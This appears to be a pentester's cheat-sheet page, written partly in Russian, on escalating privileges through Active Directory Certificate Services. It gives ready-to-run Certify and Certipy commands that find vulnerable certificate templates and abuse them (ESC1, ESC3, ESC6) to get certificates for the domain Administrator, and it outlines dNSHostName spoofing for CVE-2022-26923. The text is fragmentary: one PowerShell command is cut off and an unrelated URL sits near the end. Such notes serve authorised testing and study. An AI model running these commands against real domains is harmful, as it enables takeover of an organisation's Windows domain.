AD CS

Privesc as a Service. Повышаем привилегии через Active Directory Certification Servicesxakep.ru

To find vulnerable certificate templates you can run:

Certify.exe find /vulnerable
certipy find -username [email protected] -password Passw0rd -dc-ip 172.16.126.128

# quickly spot vulnerable elements
certipy find -u '[email protected]' -p 'password' -dc-ip 'DC_IP' -vulnerable -stdout

IF SSL ERROR

-scheme ldap

Шаблоны сертификатов хранятся в следующем контейнере:

CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=contoso,DC=com

Соответственно, получить шаблоны можно при помощи следующей команды PowerShell, используя модуль AD:

PS > Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=

Certipy + BH

wget -O ~/.config/bloodhound/customqueries.json https://raw.githubusercontent.com/ly4k/Certipy/main/customqueries.json

$ certipy find 'contoso.com/Kent.Jill:P@ssw0rd'@DC01.contoso.com

Modifiable SAN. ESC1

Это атака основывается на изменении параметра SAN, который позволяет указать альтернативное имя пользователя. Это позволит нам выпустить сертификат на другого пользователя, даже администратора домена. Чтобы атака прошла успешно, шаблон сертификата должен иметь установленный флаг ENROLLEE_SUPPLIES_SUBJECT.

$ certipy req 'contoso.com/Kent.Jill:P@ssw0rd'@DC01.contoso.com -dc-ip 10.11.1.184 -ca CA-contoso -template "1" -alt "[email protected]"

Any or None Purpose Attack. ESC2

Если в шаблоне сертификата указан EKU любого назначения или вообще отсутствует EKU, сертификат можно использовать для чего угодно. Им можно злоупотреблять, как ESC3, например использовать сертификат в качестве требования для запроса другого сертификата от имени любого пользователя.

Enrollment Agent. ESC3

В документации Microsoft указано, что EKU Certificate Request Agent может использоваться, чтобы выдать себя за другого пользователя, и позволяет выпустить сертификат, который может быть использован для совместной подписи запросов от имени любого пользователя для любого шаблона.

$ certipy req 'contoso.com/Kent.Jill:P@ssw0rd'@DC01.contoso.com -ca CA-contoso -template Agent

После того как мы получили обычного пользователя, запросим сертификат, представившись другим пользователем.

$ certipy req 'contoso.com/Kent.Jill:P@ssw0rd'@DC01.contoso.com -ca CA-contoso -template User -on-behalf-of 'contoso\Administrator' -pfx kent.jill.pfx

(EDITF_ATTRIBUTESUBJECTALTNAME2). ESC6

EDITF_ATTRIBUTESUBJECTALTNAME2 Этот флаг позволяет указать произвольный SAN (Subject Alternative Name) для всех сертификатов, несмотря на конфигурацию шаблона сертификата.

$ certipy req 'contoso.com/Kent.Jill:P@ssw0rd'@DC01.contoso.com -template <Любой шаблон> -ca CA-contoso -alt [email protected]

dNSHostName Spoofing

Полный флоу атаки выглядит следующим образом:

Создание компьютера в домене с dNSHostName, соответствующим DNS-имени контроллера домена.
Замена SPN.
Запрос сертификата для компьютера.

как проверить, уязвим ли контроллер домена к CVE-2022-26923? Главным признаком уязвимости служит наличие SID в ответе на запрос сертификата. Если он есть — патч в системе присутствует, если нет, то патча тоже нет.

Using cert without PKINIT

https://authlive.sblogistica.ru/authlive.sblogistica.ru

PreviousBrowser secrets NextLDAP

Last updated 1 month ago